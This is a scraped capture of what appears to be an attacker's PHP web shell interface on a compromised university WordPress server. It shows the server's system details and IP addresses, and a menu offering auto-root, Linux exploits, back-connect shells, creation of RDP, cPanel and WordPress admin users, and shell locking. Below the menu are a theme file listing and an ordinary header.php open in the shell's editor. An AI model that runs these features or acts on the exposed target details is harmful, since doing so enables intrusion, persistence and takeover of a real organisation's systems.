Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.135.198.82
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-content /
themes /
eventalk /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
template-parts
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
woocommerce
[ DIR ]
drwxrwxr-x
404.php
1016
B
-rw-rw-r--
comments.php
4.23
KB
-rw-rw-r--
fallback.php
915
B
-rw-rw-r--
footer.php
363
B
-rw-rw-r--
functions.php
2.32
KB
-rw-rw-r--
header.php
3.22
KB
-rw-rw-r--
index.php
1.76
KB
-rw-rw-r--
page.php
1.02
KB
-rw-rw-r--
screenshot.png
235.13
KB
-rw-rw-r--
search.php
1.08
KB
-rw-rw-r--
sidebar.php
455
B
-rw-rw-r--
single-eventalk_event.php
1.46
KB
-rw-rw-r--
single-eventalk_speaker.php
1.07
KB
-rw-rw-r--
single.php
1.02
KB
-rw-rw-r--
style-editor.css
15.59
KB
-rw-rw-r--
style.css
834
B
-rw-rw-r--
wpml-config.xml
1.75
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.0 */ namespace radiustheme\Eventalk; ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php // Preloader if ( RDTheme::$options['preloader'] ) { if ( !empty( RDTheme::$options['preloader_image']['url'] ) ) { $preloader_img = RDTheme::$options['preloader_image']['url']; echo '<div id="preloader" style="background-image:url(' . esc_url( $preloader_img ) . ');"></div>'; } else { echo '<!-- Preloader Start Here --> <div id="preloader" class="preloader"> <div class="items"> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> <div class="item"></div> </div> </div> <!-- Preloader End Here -->'; } } if ( RDTheme::$options['site_layout'] ){ $site_layout = 'full-layout'; } else { $site_layout = 'box-layout'; } ?> <div id="page" class="site site-wrp <?php echo esc_attr( $site_layout );?>"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'eventalk' ); ?></a> <?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'header' ) ) { ?> <header id="masthead" class="site-header"> <?php get_template_part( 'template-parts/header/header', RDTheme::$header_style );?> </header> <?php } ?> <?php if ( RDTheme::$options['header_btn'] ): ?> <ul class="header-action-items mobile-button-area"> <li> <?php if (RDTheme::$options['header_new_window']) { ?> <a href="<?php echo esc_url( RDTheme::$options['header_buttonUrl'] );?>" title="<?php echo esc_html( RDTheme::$options['header_buttontext'] );?>" target="_blank" class="btn-fill size-xs color-yellow border-radius-5 gust"><?php echo esc_html( RDTheme::$options['header_buttontext'] );?></a> <?php } else { ?> <a href="<?php echo esc_url( RDTheme::$options['header_buttonUrl'] );?>" title="<?php echo esc_html( RDTheme::$options['header_buttontext'] );?>" class="btn-fill size-xs color-yellow border-radius-5 gust"><?php echo esc_html( RDTheme::$options['header_buttontext'] );?></a> <?php } ?> </li> </ul> <?php endif; ?> <?php get_template_part( 'template-parts/header/header', 'offscreen' );?> <div id="content" class="site-content"> <?php get_template_part('template-parts/content', 'banner');?>
Close